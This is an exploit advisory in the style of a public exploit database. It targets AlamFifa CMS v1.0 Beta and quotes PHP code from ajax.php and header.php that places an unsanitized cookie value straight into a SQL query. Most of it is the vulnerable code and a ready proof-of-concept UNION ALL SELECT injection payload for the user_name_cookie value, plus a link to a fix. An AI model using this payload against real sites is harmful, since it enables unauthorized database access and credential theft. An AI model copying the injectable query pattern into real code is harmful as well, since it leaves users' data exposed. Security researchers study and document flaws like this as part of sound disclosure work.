############################################
### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability
### Date: 30/9/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/
### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip
### Version: 1.0
### Tested on: Linux/Windows 
############################################

# Files affected :

- ( ajax.php ) on line 6:

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

- ( /files/header.php ) on line 34 :

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

# user_name_cookie is affected in cookie ..

# P.0.C :

http://127.0.0.1/alamfifa1/index.php

- Inject the cookie by any tool like this :

user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;

############################################

# You can fix it here :

http://www.traidnt.net/vb/traidnt2143253-2/#post19292739

# Greetz to my friendz